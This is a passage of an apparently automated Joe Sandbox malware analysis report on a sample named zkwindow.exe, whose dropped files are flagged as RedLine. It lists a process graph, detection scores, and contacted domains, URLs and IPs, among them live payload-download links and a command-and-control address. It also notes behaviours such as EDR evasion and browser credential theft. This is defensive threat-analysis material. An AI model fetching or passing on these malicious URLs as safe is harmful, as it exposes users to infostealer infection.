sample has been downloaded from the Internet (zone.identifier) 15->78 80 Loading BitLocker PowerShell Module 15->80 82 Powershell drops PE file 15->82 22 AUpdate.exe 6 15->22         started        26 7za.exe 6 15->26         started        28 conhost.exe 15->28         started        50 C:\Users\user\AppData\Local\Temp\vpdcuvm, PE32 20->50 dropped 84 Writes to foreign memory regions 20->84 86 Maps a DLL or memory area into another process 20->86 30 MSBuild.exe 1 20->30         started        32 conhost.exe 20->32         started        file8 signatures9 process10 file11 54 C:\Users\user\AppData\Roaming\...\isscint.dll, PE32 22->54 dropped 56 C:\Users\user\AppData\Roaming\...\ISCmplr.dll, PE32 22->56 dropped 104 Maps a DLL or memory area into another process 22->104 106 Switches to a custom stack to bypass stack traces 22->106 108 Found direct / indirect Syscall (likely to bypass EDR) 22->108 34 cmd.exe 4 22->34         started        58 C:\Users\user\AppData\Local\...\isscint.dll, PE32 26->58 dropped 60 C:\Users\user\AppData\Local\...\ISCmplr.dll, PE32 26->60 dropped 62 C:\Users\user\AppData\Local\...\AUpdate.exe, PE32 26->62 dropped 38 conhost.exe 26->38         started        signatures12 process13 file14 52 C:\Users\user\AppData\...\bmrmmwsgmayisp, PE32 34->52 dropped 96 Writes to foreign memory regions 34->96 98 Found hidden mapped module (file has been removed from disk) 34->98 100 Maps a DLL or memory area into another process 34->100 102 Switches to a custom stack to bypass stack traces 34->102 40 MSBuild.exe 15 7 34->40         started        44 conhost.exe 34->44         started        signatures15 process16 dnsIp17 70 92.255.85.36, 15847, 49726, 49727 SOVTEL-ASRU Russian Federation 40->70 110 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 40->110 112 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 40->112 114 Tries to harvest and steal browser information (history, passwords, etc) 40->114 signatures18

                            Screenshots

                            Thumbnails

                            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                            windows-stand

                            Antivirus, Machine Learning and Genetic Malware Detection

                            Initial Sample

                            SourceDetectionScannerLabelLink
                            zkwindow.exe18%VirustotalBrowse
                            zkwindow.exe8%ReversingLabs

                            Dropped Files

                            SourceDetectionScannerLabelLink
                            C:\Users\user\AppData\Local\Temp\bmrmmwsgmayisp100%AviraTR/Agent.dtyjl
                            C:\Users\user\AppData\Local\Temp\vpdcuvm100%AviraTR/Agent.dtyjl
                            C:\Users\user\AppData\Local\Temp\7zip\7za.exe0%ReversingLabs
                            C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe0%ReversingLabs
                            C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\ISCmplr.dll5%ReversingLabs
                            C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\isscint.dll0%ReversingLabs
                            C:\Users\user\AppData\Local\Temp\bmrmmwsgmayisp74%ReversingLabsByteCode-MSIL.Ransomware.RedLine
                            C:\Users\user\AppData\Local\Temp\vpdcuvm74%ReversingLabsByteCode-MSIL.Ransomware.RedLine
                            C:\Users\user\AppData\Roaming\DH_Http\ISCmplr.dll5%ReversingLabs
                            C:\Users\user\AppData\Roaming\DH_Http\isscint.dll0%ReversingLabs

                            Unpacked PE Files

                            No Antivirus matches

                            Domains

                            No Antivirus matches

                            URLs

                            SourceDetectionScannerLabelLink
                            https://rentry.o0%Avira URL Cloudsafe
                            https://main-connection.click/Download_StarW3_pack.zip8100%Avira URL Cloudmalware
                            http://www.remobjects.com/psopenU0%Avira URL Cloudsafe
                            https://jrsoftware.org/ismail.phpopenU0%Avira URL Cloudsafe
                            http://92.255.85.36:90000%Avira URL Cloudsafe
                            http://92.255.85.36:9000t-0%Avira URL Cloudsafe
                            https://go.microsoft.co0%Avira URL Cloudsafe
                            https://jrsoftware.org/isinfo.phpopen0%Avira URL Cloudsafe
                            http://92.255.85.36:9000/wbinjget?q=8587D7BC4236146899B093C1B42EFE08P0%Avira URL Cloudsafe
                            http://92.255.85.36:9000/wbinjget?q=8587D7BC4236146899B093C1B42EFE080%Avira URL Cloudsafe
                            https://main-connection.click/Download_StarW3_pack.zip100%Avira URL Cloudmalware
                            https://main-connection.click/archive.100%Avira URL Cloudmalware
                            https://main-connection.clickp0%Avira URL Cloudsafe
                            http://cscasha2.ocsp-certum.com040%Avira URL Cloudsafe
                            https://main-connection.click100%Avira URL Cloudmalware
                            http://92.255.85.36:0%Avira URL Cloudsafe
                            http://main-connection.click100%Avira URL Cloudmalware
                            https://main-connection.click/archive.zip100%Avira URL Cloudmalware
                            https://jrsoftware.org/isdonate.phpopenj0%Avira URL Cloudsafe

                            Domains and IPs

                            Contacted Domains

                            NameIPActiveMaliciousAntivirus DetectionReputation
                            edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com
                            		217.20.57.34
                            		truefalse
                              		high
                              rentry.org
                              		164.132.58.105
                              		truefalse
                                		high
                                main-connection.click
                                		188.114.97.3
                                		truefalse
                                  		unknown
                                  pki-goog.l.google.com
                                  		142.250.184.227
                                  		truefalse
                                    		high
                                    c.pki.goog
                                    		unknown
                                    		unknownfalse
                                      		high

                                      Contacted URLs

                                      NameMaliciousAntivirus DetectionReputation
                                      https://rentry.org/0xf6EA7bF5d089F439Ec6e7a131388579d0Caa862d4EE0false
                                        		high
                                        http://92.255.85.36:9000/wbinjget?q=8587D7BC4236146899B093C1B42EFE08true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://main-connection.click/Download_StarW3_pack.zipfalse
                                        • Avira URL Cloud: malware
                                        		unknown
                                        https://rentry.org/0xf6EA7bF5d089F439Ec6e7010101a88579d0Caa862d4EE0false
                                          		high
                                          https://main-connection.click/archive.zipfalse
                                          • Avira URL Cloud: malware
                                          		unknown

                                          URLs from Memory and Binaries

                                          NameSourceMaliciousAntivirus DetectionReputation
                                          https://rentry.opowershell.exe, 00000001.00000002.1556343384.0000022CB1D2E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1556343384.0000022CB1BAF000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://duckduckgo.com/ac/?q=MSBuild.exe, 0000000E.00000002.2497394754.0000000002969000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2497394754.0000000002AC3000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2497394754.0000000002A17000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2497394754.0000000002B72000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://pastebin.com/raw/DWCCqGB0MSBuild.exe, 00000014.00000002.2074279644.0000000003131000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://www.vmware.com/0AUpdate.exe, 0000000B.00000002.1625640518.00000000098D7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.1806880293.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2069760672.00000000051BE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://repository.certum.pl/cscasha2.cer0isscint.dll.9.drfalse
                                                  		high
                                                  http://ocsp.sectigo.com0isscint.dll.9.dr, AUpdate.exe.9.dr, ISCmplr.dll.9.drfalse
                                                    		high
                                                    https://go.microsoft.copowershell.exe, 00000001.00000002.1584358339.0000022CC86F7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://jrsoftware.org/ismail.phpopenUAUpdate.exe, 0000000B.00000000.1554247133.0000000000401000.00000020.00000001.01000000.00000009.sdmp, AUpdate.exe.9.drfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://rentry.orgpowershell.exe, 00000001.00000002.1556343384.0000022CB06AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1556343384.0000022CB1CB7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://92.255.85.36:9000/wbinjget?q=8587D7BC4236146899B093C1B42EFE08PMSBuild.exe, 0000000E.00000002.2497394754.000000000280D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://contoso.com/Licensepowershell.exe, 00000001.00000002.1580242544.0000022CC04F4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://rentry.co/0xf6EA7bF5d089F439Ec6e7a131388579d0Caa862d4EE0powershell.exe, 00000001.00000002.1556343384.0000022CB1BAF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://rentry.co/0xf6ea7bf5d089f439ec6e7a131388579d0caa862d4ee0powershell.exe, 00000001.00000002.1556343384.0000022CB1BAF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://ccsca2021.crl.certum.pl/ccsca2021.crl0sAUpdate.exe.9.dr, ISCmplr.dll.9.drfalse
                                                              		high
                                                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=MSBuild.exe, 0000000E.00000002.2497394754.0000000002969000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2497394754.0000000002AC3000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2497394754.0000000002A17000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2497394754.0000000002B72000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://repository.certum.pl/ccsca2021.cer0AUpdate.exe.9.dr, ISCmplr.dll.9.drfalse
                                                                  		high
                                                                  https://rentry.org/powershell.exe, 00000001.00000002.1556343384.0000022CB1D2E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1556343384.0000022CB1BAF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://www.google.com/images/branding/product/ico/googleg_alldp.icoMSBuild.exe, 0000000E.00000002.2497394754.0000000002969000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2497394754.0000000002AC3000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2497394754.0000000002A17000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2497394754.0000000002B72000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://rentry.orgpowershell.exe, 00000001.00000002.1556343384.0000022CB1CE7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://rentry.co/0xf6EA7bF5d089F439Ec6e7010101a88579d0Caa862d4EE0powershell.exe, 00000001.00000002.1556343384.0000022CB1D2E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1556343384.0000022CB090B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://92.255.85.36:9000t-MSBuild.exe, 0000000E.00000002.2497394754.000000000280D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://www.remobjects.com/psAUpdate.exe, 0000000B.00000000.1554247133.0000000000401000.00000020.00000001.01000000.00000009.sdmp, AUpdate.exe.9.drfalse
                                                                            		high
                                                                            http://subca.ocsp-certum.com02AUpdate.exe.9.dr, ISCmplr.dll.9.drfalse
                                                                              		high
                                                                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchMSBuild.exe, 0000000E.00000002.2497394754.0000000002969000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2497394754.0000000002AC3000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2497394754.0000000002A17000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2497394754.0000000002B72000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://subca.ocsp-certum.com01isscint.dll.9.drfalse
                                                                                  		high
                                                                                  https://contoso.com/powershell.exe, 00000001.00000002.1580242544.0000022CC04F4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.1580242544.0000022CC04F4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://www.innosetup.com/AUpdate.exe, 0000000B.00000000.1554247133.0000000000401000.00000020.00000001.01000000.00000009.sdmp, AUpdate.exe.9.drfalse
                                                                                        		high
                                                                                        https://sectigo.com/CPS0Disscint.dll.9.drfalse
                                                                                          		high
                                                                                          http://crl.certum.pl/ctnca2.crl0lAUpdate.exe.9.dr, ISCmplr.dll.9.drfalse
                                                                                            		high
                                                                                            http://repository.certum.pl/ctnca2.cer09AUpdate.exe.9.dr, ISCmplr.dll.9.drfalse
                                                                                              		high
                                                                                              https://jrsoftware.org0isscint.dll.9.dr, AUpdate.exe.9.dr, ISCmplr.dll.9.drfalse
                                                                                                		high
                                                                                                https://jrsoftware.org/isscint.dll.9.dr, AUpdate.exe.9.dr, ISCmplr.dll.9.drfalse
                                                                                                  		high
                                                                                                  https://jrsoftware.org/isinfo.phpopenAUpdate.exe, 0000000B.00000000.1554247133.0000000000401000.00000020.00000001.01000000.00000009.sdmp, AUpdate.exe.9.drfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  		unknown
                                                                                                  http://92.255.85.36:9000MSBuild.exe, 0000000E.00000002.2497394754.00000000027BD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  		unknown
                                                                                                  http://ccsca2021.ocsp-certum.com05AUpdate.exe.9.dr, ISCmplr.dll.9.drfalse
                                                                                                    		high
                                                                                                    https://main-connection.click/Download_StarW3_pack.zip8powershell.exe, 00000001.00000002.1556343384.0000022CB090B000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                                    • Avira URL Cloud: malware
                                                                                                    		unknown
                                                                                                    http://www.microsoft.cpowershell.exe, 00000001.00000002.1586741158.0000022CC89E2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.1556343384.0000022CB0481000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2497394754.0000000002721000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        http://www.remobjects.com/psopenUAUpdate.exe, 0000000B.00000000.1554247133.0000000000401000.00000020.00000001.01000000.00000009.sdmp, AUpdate.exe.9.drfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		unknown
                                                                                                        http://www.certum.pl/CPS0isscint.dll.9.dr, AUpdate.exe.9.dr, ISCmplr.dll.9.drfalse
                                                                                                          		high
                                                                                                          https://cdn4.buysellads.net/pub/rentryorg.js?powershell.exe, 00000001.00000002.1556343384.0000022CB1D2E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1556343384.0000022CB090B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1556343384.0000022CB1BAF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1556343384.0000022CB086A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://pastebin.com/raw/DWCCqGB0POMSBuild.exe, 00000014.00000002.2074279644.0000000003131000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.1580242544.0000022CC04F4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000001.00000002.1556343384.0000022CB096C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://sectigo.com/CPS0AUpdate.exe.9.dr, ISCmplr.dll.9.drfalse
                                                                                                                    		high
                                                                                                                    http://repository.certum.pl/ctnca.cer09isscint.dll.9.drfalse
                                                                                                                      		high
                                                                                                                      http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000001.00000002.1556343384.0000022CB06AB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000001.00000002.1556343384.0000022CB096C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          http://crl.certum.pl/ctnca.crl0kisscint.dll.9.drfalse
                                                                                                                            		high
                                                                                                                            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000001.00000002.1556343384.0000022CB06AB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://go.micropowershell.exe, 00000001.00000002.1556343384.0000022CB228E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1556343384.0000022CB2310000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://rentry.co/static/icons/512.pngpowershell.exe, 00000001.00000002.1556343384.0000022CB1BAF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://contoso.com/Iconpowershell.exe, 00000001.00000002.1580242544.0000022CC04F4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    http://www.vmware.com/0/AUpdate.exe, 0000000B.00000002.1625640518.00000000098D7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.1806880293.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2069760672.00000000051BE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=MSBuild.exe, 0000000E.00000002.2497394754.0000000002969000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2497394754.0000000002AC3000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2497394754.0000000002A17000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2497394754.0000000002B72000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://ac.ecosia.org?q=MSBuild.exe, 0000000E.00000002.2497394754.0000000002969000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2497394754.0000000002AC3000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2497394754.0000000002A17000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2497394754.0000000002B72000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://main-connection.click/archive.powershell.exe, 00000001.00000002.1556343384.0000022CB1BAF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                          		unknown
                                                                                                                                          https://main-connection.clickppowershell.exe, 00000001.00000002.1556343384.0000022CB1E26000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                          		unknown
                                                                                                                                          https://main-connection.clickpowershell.exe, 00000001.00000002.1556343384.0000022CB1131000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1556343384.0000022CB1E26000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1556343384.0000022CB090B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                          		unknown
                                                                                                                                          https://www.certum.pl/CPS0isscint.dll.9.dr, AUpdate.exe.9.dr, ISCmplr.dll.9.drfalse
                                                                                                                                            		high
                                                                                                                                            http://www.symauth.com/cps0(AUpdate.exe, 0000000B.00000002.1625640518.00000000098D7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.1806880293.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2069760672.00000000051BE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              http://crl.certum.pl/cscasha2.crl0qisscint.dll.9.drfalse
                                                                                                                                                		high
                                                                                                                                                https://github.com/Pester/Pesterpowershell.exe, 00000001.00000002.1556343384.0000022CB06AB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  https://rentry.co/0xf6ea7bf5d089f439ec6e7010101a88579d0caa862d4ee0powershell.exe, 00000001.00000002.1556343384.0000022CB1D2E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1556343384.0000022CB090B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    http://cscasha2.ocsp-certum.com04isscint.dll.9.drfalse
                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                    		unknown
                                                                                                                                                    http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0tisscint.dll.9.dr, AUpdate.exe.9.dr, ISCmplr.dll.9.drfalse
                                                                                                                                                      		high
                                                                                                                                                      https://www.ecosia.org/newtab/v20MSBuild.exe, 0000000E.00000002.2497394754.0000000002969000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2497394754.0000000002AC3000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2497394754.0000000002A17000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2497394754.0000000002B72000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        http://main-connection.clickpowershell.exe, 00000001.00000002.1556343384.0000022CB1E26000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        • Avira URL Cloud: malware
                                                                                                                                                        		unknown
                                                                                                                                                        http://www.symauth.com/rpa00AUpdate.exe, 0000000B.00000002.1625640518.00000000098D7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.1806880293.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2069760672.00000000051BE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          https://duckduckgo.com/chrome_newtabv20MSBuild.exe, 0000000E.00000002.2497394754.0000000002969000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2497394754.0000000002AC3000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2497394754.0000000002A17000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2497394754.0000000002B72000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#isscint.dll.9.dr, AUpdate.exe.9.dr, ISCmplr.dll.9.drfalse
                                                                                                                                                              		high
                                                                                                                                                              http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000001.00000002.1556343384.0000022CB096C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                https://jrsoftware.org/isdonate.phpopenjAUpdate.exe, 0000000B.00000000.1554247133.0000000000401000.00000020.00000001.01000000.00000009.sdmp, AUpdate.exe.9.drfalse
                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                		unknown
                                                                                                                                                                http://www.info-zip.org/AUpdate.exe, 0000000B.00000002.1625640518.0000000009881000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.1806880293.0000000004E99000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2069760672.0000000005176000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  https://aka.ms/pscore68powershell.exe, 00000001.00000002.1556343384.0000022CB0481000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    http://92.255.85.36:MSBuild.exe, 0000000E.00000002.2497394754.000000000280D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                    		unknown
                                                                                                                                                                    https://www.innosetup.compowershell.exe, 00000001.00000002.1585418830.0000022CC88C8000.00000004.00000020.00020000.00000000.sdmp, AUpdate.exe, 0000000B.00000000.1554584495.0000000000657000.00000002.00000001.01000000.00000009.sdmp, AUpdate.exe, 0000000B.00000002.1618449030.0000000000DD0000.00000002.00000001.01000000.0000000B.sdmp, AUpdate.exe.9.dr, ISCmplr.dll.9.drfalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=MSBuild.exe, 0000000E.00000002.2497394754.0000000002969000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2497394754.0000000002AC3000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2497394754.0000000002A17000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2497394754.0000000002B72000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        https://gemini.google.com/app?q=MSBuild.exe, 0000000E.00000002.2497394754.0000000002969000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2497394754.0000000002AC3000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2497394754.0000000002A17000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2497394754.0000000002B72000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          		high

                                                                                                                                                                          World Map of Contacted IPs

                                                                                                                                                                          • No. of IPs < 25%
                                                                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                                                                          • 75% < No. of IPs

                                                                                                                                                                          Public IPs

                                                                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                          164.132.58.105
                                                                                                                                                                          		rentry.orgFrance
                                                                                                                                                                          		16276OVHFRfalse
                                                                                                                                                                          188.114.97.3
                                                                                                                                                                          		main-connection.clickEuropean Union
                                                                                                                                                                          		13335CLOUDFLARENETUSfalse
                                                                                                                                                                          92.255.85.36
                                                                                                                                                                          		unknownRussian Federation
                                                                                                                                                                          		42097SOVTEL-ASRUtrue

                                                                                                                                                                          General Information

                                                                                                                                                                          Joe Sandbox version:42.0.0 Malachite
                                                                                                                                                                          Analysis ID:1634350
                                                                                                                                                                          Start date and time:2025-03-10 21:38:37 +01:00
                                                                                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                                                                                          Overall analysis duration:0h 10m 26s
                                                                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                                                                          Report type:full
                                                                                                                                                                          Cookbook file name:default.jbs
                                                                                                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                          Number of analysed new started processes analysed:22
                                                                                                                                                                          Number of new started drivers analysed:0
                                                                                                                                                                          Number of existing processes analysed:0
                                                                                                                                                                          Number of existing drivers analysed:0
                                                                                                                                                                          Number of injected processes analysed:0
                                                                                                                                                                          Technologies:
                                                                                                                                                                          • HCA enabled
                                                                                                                                                                          • EGA enabled
                                                                                                                                                                          • AMSI enabled
                                                                                                                                                                          Analysis Mode:default
                                                                                                                                                                          Analysis stop reason:Timeout
                                                                                                                                                                          Sample name:zkwindow.exe
                                                                                                                                                                          Detection:MAL
                                                                                                                                                                          Classification:mal100.troj.spyw.evad.winEXE@20/28@3/3
                                                                                                                                                                          EGA Information:
                                                                                                                                                                          • Successful, ratio: 75%
                                                                                                                                                                          HCA Information:
                                                                                                                                                                          • Successful, ratio: 99%
                                                                                                                                                                          • Number of executed functions: 127
                                                                                                                                                                          • Number of non-executed functions: 226
                                                                                                                                                                          Cookbook Comments:
                                                                                                                                                                          • Found application associated with file extension: .exe

                                                                                                                                                                          Warnings

                                                                                                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                                                                                                          • Excluded IPs from analysis (whitelisted): 23.60.203.209, 217.20.57.34, 4.175.87.197, 52.165.164.15, 20.12.23.50, 40.69.42.241, 204.79.197.222
                                                                                                                                                                          • Excluded domains from analysis (whitelisted): fp.msedge.net, fs.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, e16604.f.akamaiedge.net, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
                                                                                                                                                                          • Execution Graph export aborted for target powershell.exe, PID 7820 because it is empty
                                                                                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                          • Report size getting too big, too many NtCreateKey calls found.
